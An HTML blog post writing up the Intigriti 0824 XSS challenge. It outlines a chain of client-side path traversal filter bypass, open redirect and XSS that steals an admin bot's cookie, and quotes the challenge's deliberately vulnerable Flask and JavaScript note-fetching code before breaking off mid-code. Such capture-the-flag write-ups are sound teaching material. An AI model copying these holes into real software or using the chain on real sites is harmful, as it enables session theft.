<!DOCTYPE html>
<html lang="en" itemscope itemtype="http://schema.org/WebPage">
  <head>
    

  <meta charset="utf-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0">

 


      <title>Intigriti 0824 XSS Challenge - Alfin&#39;s Notes</title>

  <meta name="description" content="tl;dr

Bypassing CSPT filters and UUID validations implemented using Regex .
Chaining CSPT and Open-Redirect to achieve XSS .
Finally XSS and retrive the admin cookie .
">
  <meta name="author" content="Alfin Joseph"/><script type="application/ld+json">
{
    "@context": "http://schema.org",
    "@type": "WebSite",
    "name": "Alfins Notes",
    
    "url": "https:\/\/Alfinj0se.github.io\/"
}
</script><script type="application/ld+json">
{
  "@context": "http://schema.org",
  "@type": "Organization",
  "name": "",
  "url": "https:\/\/Alfinj0se.github.io\/"
  
  
  
  
}
</script>
<script type="application/ld+json">
{
  "@context": "http://schema.org",
  "@type": "BreadcrumbList",
  "itemListElement": [{
        "@type": "ListItem",
        "position": 1,
        "item": {
          "@id": "https:\/\/Alfinj0se.github.io\/",
          "name": "home"
        }
    },{
        "@type": "ListItem",
        "position": 3,
        "item": {
          "@id": "https:\/\/Alfinj0se.github.io\/posts\/intigritixssaug2024\/",
          "name": "Intigriti 0824 xss challenge"
        }
    }]
}
</script><script type="application/ld+json">
{
  "@context": "http://schema.org",
  "@type": "Article",
  "author": {
    "name" : "Alfin Joseph"
  },
  "headline": "Intigriti 0824 XSS Challenge",
  "description" : "tl;dr\nBypassing CSPT filters and UUID validations implemented using Regex . Chaining CSPT and Open-Redirect to achieve XSS . Finally XSS and retrive the admin cookie . ",
  "inLanguage" : "en",
  "wordCount":  1340 ,
  "datePublished" : "2024-08-15T15:11:47\u002b05:30",
  "dateModified" : "2024-08-15T15:11:47\u002b05:30",
  "image" : "https:\/\/Alfinj0se.github.io\/img\/pfp.jpg",
  "keywords" : [ "writeups" ],
  "mainEntityOfPage" : "https:\/\/Alfinj0se.github.io\/posts\/intigritixssaug2024\/",
  "publisher" : {
    "@type": "Organization",
    "name" : "https:\/\/Alfinj0se.github.io\/",
    "logo" : {
        "@type" : "ImageObject",
        "url" : "https:\/\/Alfinj0se.github.io\/img\/pfp.jpg",
        "height" :  60 ,
        "width" :  60
    }
  }
}
</script>


<meta property="og:title" content="Intigriti 0824 XSS Challenge" />
<meta property="og:description" content="tl;dr

Bypassing CSPT filters and UUID validations implemented using Regex .
Chaining CSPT and Open-Redirect to achieve XSS .
Finally XSS and retrive the admin cookie .
">
<meta property="og:image" content="https://Alfinj0se.github.io/img/pfp.jpg" />
<meta property="og:url" content="https://Alfinj0se.github.io/posts/intigritixssaug2024/" />
<meta property="og:type" content="website" />
<meta property="og:site_name" content="Alfins Notes" />

  <meta name="twitter:title" content="Intigriti 0824 XSS Challenge" />
  <meta name="twitter:description" content="tl;dr

Bypassing CSPT filters and UUID validations implemented using Regex .
Chaining CSPT and Open-Redirect to achieve XSS .
Finally XSS and retrive the admin cookie .
">
  <meta name="twitter:image" content="https://Alfinj0se.github.io/img/pfp.jpg" />
  <meta name="twitter:card" content="summary_large_image" />
  <meta name="twitter:site" content="@Alfinjoseph19" />
  <meta name="twitter:creator" content="@Alfinjoseph19" />
  <link href='https://Alfinj0se.github.io/img/favicon.ico' rel='icon' type='image/x-icon'/>
  <meta name="generator" content="Hugo 0.126.1">
  <link rel="alternate" href="https://Alfinj0se.github.io/index.xml" type="application/rss+xml" title="Alfins Notes"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.16.7/dist/katex.min.css" integrity="sha384-3UiQGuEI4TTMaFmGIZumfRPtfKQ3trwQE2JgosJxCnGmQpL/lJdjpcHkaaFwHlcI" crossorigin="anonymous">
  <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.5.0/css/all.css" integrity="sha384-B4dIYHKNBt8Bc12p+WXckhzcICo0wtJAoU8YZTY5qE0Id1GSseTk6S+L3BlXeVIU" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@3.4.1/dist/css/bootstrap.min.css" integrity="sha384-HSMxcRTRxnN+Bdg0JdbxYKrThecOKuH5zCYotlSAcp1+c8xmyTe9GYg1l9a69psu" crossorigin="anonymous"><link rel="stylesheet" href="https://Alfinj0se.github.io/css/main.css" /><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic" />
  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800" /><link rel="stylesheet" href="https://Alfinj0se.github.io/css/syntax.css" /><link rel="stylesheet" href="https://Alfinj0se.github.io/css/codeblock.css" /><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/photoswipe/4.1.2/photoswipe.min.css" integrity="sha384-h/L2W9KefUClHWaty3SLE5F/qvc4djlyR4qY3NUV5HGQBBW7stbcfff1+I/vmsHh" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/photoswipe/4.1.2/default-skin/default-skin.min.css" integrity="sha384-iD0dNku6PYSIQLyfTOpB06F2KCZJAKLOThS5HRe8b3ibhdEQ6eKsFf/EeFxdOt5R" crossorigin="anonymous">

  


  </head>
  <body>
    <nav class="navbar navbar-default navbar-fixed-top navbar-custom">
  <div class="container-fluid">
    <div class="navbar-header">
      <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#main-navbar">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
      <a class="navbar-brand" href="https://Alfinj0se.github.io/">Alfins Notes</a>
    </div>

    <div class="collapse navbar-collapse" id="main-navbar">
      <ul class="nav navbar-nav navbar-right">
        
          
            <li>
              <a title="Blog" href="/">Blog</a>
            </li>
          
        
          
            <li>
              <a title="About" href="/page/about/">About</a>
            </li>
          
        

        

        
      </ul>
    </div>

    
      <div class="avatar-container">
        <div class="avatar-img-border">
          <a title="Alfins Notes" href="https://Alfinj0se.github.io/">
            <img class="avatar-img" src="https://Alfinj0se.github.io/img/pfp.jpg" alt="Alfins Notes" />
          </a>
        </div>
      </div>
    

  </div>
</nav>




    


<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

<div class="pswp__bg"></div>

<div class="pswp__scroll-wrap">
    
    <div class="pswp__container">
      <div class="pswp__item"></div>
      <div class="pswp__item"></div>
      <div class="pswp__item"></div>
    </div>
    
    <div class="pswp__ui pswp__ui--hidden">
    <div class="pswp__top-bar">
      
      <div class="pswp__counter"></div>
      <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
      <button class="pswp__button pswp__button--share" title="Share"></button>
      <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
      <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
      
      
      <div class="pswp__preloader">
        <div class="pswp__preloader__icn">
          <div class="pswp__preloader__cut">
            <div class="pswp__preloader__donut"></div>
          </div>
        </div>
      </div>
    </div>
    <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
      <div class="pswp__share-tooltip"></div>
    </div>
    <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
    </button>
    <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
    </button>
    <div class="pswp__caption">
      <div class="pswp__caption__center"></div>
    </div>
    </div>
    </div>
</div>


  
  
  






  

  <header class="header-section ">
    
    
    <div class="intro-header no-img">
      <div class="container">
        <div class="row">
          <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
            <div class="posts-heading">
              
                <h1>Intigriti 0824 XSS Challenge</h1>
              
              
                <hr class="small">
              
              
              
            </div>
          </div>
        </div>
      </div>
    </div>
  
  </header>


    
<div class="container" role="main">
  <div class="row">
    <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
      <article role="main" class="blog-post">
        <p><strong>tl;dr</strong></p>
<ul>
<li>Bypassing CSPT filters and UUID validations implemented using Regex .</li>
<li>Chaining CSPT and Open-Redirect to achieve XSS .</li>
<li>Finally XSS and retrive the admin cookie .</li>
</ul>
<hr>
<p><strong>Intigriti dropped another awesome XSS challenge</strong>, This time created by <a href="https://x.com/_CryptoCat">@_CryptoCat</a>. The challenge felt fairly straightforward,  definitely less headbanging than usual, I managed to solve it in around 20 minutes after diving in.</p>
<h2 id="-challenge-overview">🔎 Challenge Overview</h2>
<p>The challenge revolved around a classic note-taking application, featuring standard functionalities like creating , viewing notes and also it included an option to report the note, which would trigger an admin bot to visit and review it.</p>
<p><img src="/img/post/IntigritiXssAug2024/challenge.png" alt="image"></p>
<p>As is typical with XSS challenges, the goal was to obtain the admin bot&rsquo;s cookie, which was the flag. For that we needed XSS.</p>
<p>Firstly taking a closer look at 2 features, which are</p>
<ul>
<li>Create Note</li>
<li>View Note</li>
</ul>
<h2 id="1-create-note">1) Create Note</h2>
<p>The Create Note feature is straightforward. It sends a request to <code>/api/notes/fetch</code>, creating a note with a unique UUID. The note can then be viewed by navigating to <code>/view?note-uuid</code> .</p>
<hr>
<div class="highlight"><div style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 1
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 2
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 3
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 4
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 5
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 6
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 7
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 8
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 9
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">10
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">11
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">12
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">13
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">14
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">15
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">16
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-py" data-lang="py"><span style="display:flex;"><span><span style="color:#ff9f43">@main.route</span>(<span style="color:#5af78e">&#39;/api/notes/store&#39;</span>, methods<span style="color:#ff6ac1">=</span>[<span style="color:#5af78e">&#39;POST&#39;</span>])
</span></span><span style="display:flex;"><span><span style="color:#ff9f43">@login_required</span>
</span></span><span style="display:flex;"><span><span style="color:#ff6ac1">def</span> <span style="color:#57c7ff">store</span>():
</span></span><span style="display:flex;"><span>    data <span style="color:#ff6ac1">=</span> request<span style="color:#ff6ac1">.</span>get_json()
</span></span><span style="display:flex;"><span>    content <span style="color:#ff6ac1">=</span> data<span style="color:#ff6ac1">.</span>get(<span style="color:#5af78e">&#39;content&#39;</span>)
</span></span><span style="display:flex;"><span>    <span style="color:#78787e"># Server-side XSS protection</span>
</span></span><span style="display:flex;"><span>    sanitized_content <span style="color:#ff6ac1">=</span> bleach<span style="color:#ff6ac1">.</span>clean(content)
</span></span><span style="display:flex;"><span>    note <span style="color:#ff6ac1">=</span> Note<span style="color:#ff6ac1">.</span>query<span style="color:#ff6ac1">.</span>filter_by(user_id<span style="color:#ff6ac1">=</span>current_user<span style="color:#ff6ac1">.</span>id)<span style="color:#ff6ac1">.</span>first()
</span></span><span style="display:flex;"><span>    <span style="color:#ff6ac1">if</span> note:
</span></span><span style="display:flex;"><span>        note<span style="color:#ff6ac1">.</span>content <span style="color:#ff6ac1">=</span> sanitized_content
</span></span><span style="display:flex;"><span>    <span style="color:#ff6ac1">else</span>:
</span></span><span style="display:flex;"><span>        note <span style="color:#ff6ac1">=</span> Note(user_id<span style="color:#ff6ac1">=</span>current_user<span style="color:#ff6ac1">.</span>id, content<span style="color:#ff6ac1">=</span>sanitized_content)
</span></span><span style="display:flex;"><span>        db<span style="color:#ff6ac1">.</span>session<span style="color:#ff6ac1">.</span>add(note)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    db<span style="color:#ff6ac1">.</span>session<span style="color:#ff6ac1">.</span>commit()
</span></span><span style="display:flex;"><span>    <span style="color:#ff6ac1">return</span> jsonify({<span style="color:#5af78e">&#39;success&#39;</span>: <span style="color:#5af78e">&#39;Note stored&#39;</span>, <span style="color:#5af78e">&#39;note_id&#39;</span>: note<span style="color:#ff6ac1">.</span>id})
</span></span></code></pre></td></tr></table>
</div>
</div><hr>
<p>The note content is sanitized server-side using the Bleach library, so this eliminates any possibility of any quick XSS.But still we had a harmless <strong>Html injection</strong>.</p>
<h2 id="2-view-note">2) View Note</h2>
<p>This appeared to be the real challenge. Upon checkin <code>view.html</code>, it becomes clear that the note-uuid is used to fetch the note contents via the fetch() method.</p>
<hr>
<div class="highlight"><div style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">3
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">4
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">5
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">6
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">7
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">8
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-js" data-lang="js"><span style="display:flex;"><span> <span style="color:#ff5c57">window</span>.addEventListener(<span style="color:#5af78e">&#34;load&#34;</span>, <span style="color:#ff5c57">function</span> () {
</span></span><span style="display:flex;"><span>        <span style="color:#ff6ac1">const</span> urlParams <span style="color:#ff6ac1">=</span> <span style="color:#ff6ac1">new</span> URLSearchParams(<span style="color:#ff5c57">window</span>.location.search);
</span></span><span style="display:flex;"><span>        <span style="color:#ff6ac1">const</span> noteId <span style="color:#ff6ac1">=</span> urlParams.get(<span style="color:#5af78e">&#34;note&#34;</span>);
</span></span><span style="display:flex;"><span>        <span style="color:#ff6ac1">if</span> (noteId) {
</span></span><span style="display:flex;"><span>            <span style="color:#ff5c57">document</span>.getElementById(<span style="color:#5af78e">&#34;note-id-input&#34;</span>).value <span style="color:#ff6ac1">=</span> noteId;
</span></span><span style="display:flex;"><span>            validateAndFetchNote(noteId);
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>    });
</span></span></code></pre></td></tr></table>
</div>
</div><hr>
<p>Immediately, my mind turned to <strong>CSPT (Client-Side Path Traversal)</strong>, given that we had control over the fetch request.</p>
<blockquote>
<p>Client Side Path Traversal attacks arises when a web application loads some content using XHR(XmlHTTPRequests) or fetch() and the user have control over some section of the path where to load the resource.</p>
</blockquote>
<p>Taking a look at the <code>validateAndFetchNote()</code> function</p>
<hr>
<div class="highlight"><div style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 1
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 2
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 3
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 4
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 5
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 6
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 7
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 8
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 9
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">10
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">11
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">12
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-js" data-lang="js"><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#ff5c57">function</span> validateAndFetchNote(noteId) {
</span></span><span style="display:flex;"><span>        <span style="color:#ff6ac1">if</span> (noteId <span style="color:#ff6ac1">&amp;&amp;</span> isValidUUID(noteId.trim())) {
</span></span><span style="display:flex;"><span>            history.pushState(<span style="color:#ff6ac1">null</span>, <span style="color:#5af78e">&#34;&#34;</span>, <span style="color:#5af78e">&#34;?note=&#34;</span> <span style="color:#ff6ac1">+</span> noteId);
</span></span><span style="display:flex;"><span>            fetchNoteById(noteId);
</span></span><span style="display:flex;"><span>        } <span style="color:#ff6ac1">else</span> {
</span></span><span style="display:flex;"><span>            showFlashMessage(
</span></span><span style="display:flex;"><span>                <span style="color:#5af78e">&#34;Please enter a valid note ID,&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#5af78e">&#34;danger&#34;</span>
</span></span><span style="display:flex;"><span>            );
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>    }
</span></span></code></pre></td></tr></table>
</div>
</div><hr>
<p>Looks like there are some checks after all .</p>
<p>It only fetched notes with valid UUIDs using the <code>isValidUUID()</code> function. Additionally, the fetchNoteByID() function had a CSPT check before making the actual fetch by using <code>noteId.includes(&quot;../&quot;)</code> .</p>
<hr>
<div class="highlight"><div style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 1
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 2
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 3
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 4
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 5
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 6
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 7
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 8
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 9
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">10
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">11
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">12
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">13
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">14
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">15
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">16
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">17
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">18
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">19
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">20
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">21
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">22
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">23
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">24
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">25
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">26
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">27
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">28
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">29
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">30
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">31
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">32
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">33
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">34
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">35
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-js" data-lang="js"><span style="display:flex;"><span><span style="color:#ff5c57">function</span> fetchNoteById(noteId) {
</span></span><span style="display:flex;"><span>        <span style="color:#ff6ac1">if</span> (noteId.includes(<span style="color:#5af78e">&#34;../&#34;</span>)) {
</span></span><span style="display:flex;"><span>            showFlashMessage(<span style="color:#5af78e">&#34;Input not allowed!&#34;</span>, <span style="color:#5af78e">&#34;danger&#34;</span>);
</span></span><span style="display:flex;"><span>            <span style="color:#ff6ac1">return</span>;
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>        fetch(<span style="color:#5af78e">&#34;/api/notes/fetch/&#34;</span> <span style="color:#ff6ac1">+</span> <span style="color:#ff5c57">decodeURIComponent</span>(noteId), {
</span></span><span style="display:flex;"><span>            method<span style="color:#ff6ac1">:</span> <span style="color:#5af78e">&#34;GET&#34;</span>,
</span></span><span style="display:flex;"><span>            headers<span style="color:#ff6ac1">:</span> {
</span></span><span style="display:flex;"><span>                <span style="color:#5af78e">&#34;X-CSRFToken&#34;</span><span style="color:#ff6ac1">:</span> csrf_token,
</span></span><span style="display:flex;"><span>            },
</span></span><span style="display:flex;"><span>        })
</span></span><span style="display:flex;"><span>            .then((response) =&gt; response.json())
</span></span><span style="display:flex;"><span>            .then((data) =&gt; {
</span></span><span style="display:flex;"><span>                <span style="color:#ff6ac1">if</span> (data.content) {
</span></span><span style="display:flex;"><span>                    <span style="color:#ff5c57">document</span>.getElementById(<span style="color:#5af78e">&#34;note-content&#34;</span>).innerHTML <span style="color:#ff6ac1">=</span>
</span></span><span style="display:flex;"><span>                        DOMPurify.sanitize(data.content);
</span></span><span style="display:flex;"><span>                    <span style="color:#ff5c57">document</span>.getElementById(
</span></span><span style="display:flex;"><span>                        <span style="color:#5af78e">&#34;note-content-section&#34;</span>
</span></span><span style="display:flex;"><span>                    ).style.display <span style="color:#ff6ac1">=</span> <span style="color:#5af78e">&#34;block&#34;</span>;
</span></span><span style="display:flex;"><span>                    showFlashMessage(<span style="color:#5af78e">&#34;Note loaded successfully!&#34;</span>, <span style="color:#5af78e">&#34;success&#34;</span>);
</span></span><span style="display:flex;"><span>                } <span style="color:#ff6ac1">else</span> <span style="color:#ff6ac1">if</span> (data.error) {
</span></span><span style="display:flex;"><span>                    showFlashMessage(<span style="color:#5af78e">&#34;Error: &#34;</span> <span style="color:#ff6ac1">+</span> data.error, <span style="color:#5af78e">&#34;danger&#34;</span>);
</span></span><span style="display:flex;"><span>                } <span style="color:#ff6ac1">else</span> {
</span></span><span style="display:flex;"><span>                    showFlashMessage(<span style="color:#5af78e">&#34;Note doesn&#39;t exist.&#34;</span>, <span style="color:#5af78e">&#34;info&#34;</span>);
</span></span><span style="display:flex;"><span>                }
</span></span><span style="display:flex;"><span>                <span style="color:#ff6ac1">if</span> (data.debug) {
</span></span><span style="display:flex;"><span>                    <span style="color:#ff5c57">document</span>.getElementById(<span style="color:#5af78e">&#34;debug-content&#34;</span>).outerHTML <span style="color:#ff6ac1">=</span>
</span></span><span style="display:flex;"><span>                        data.debug;
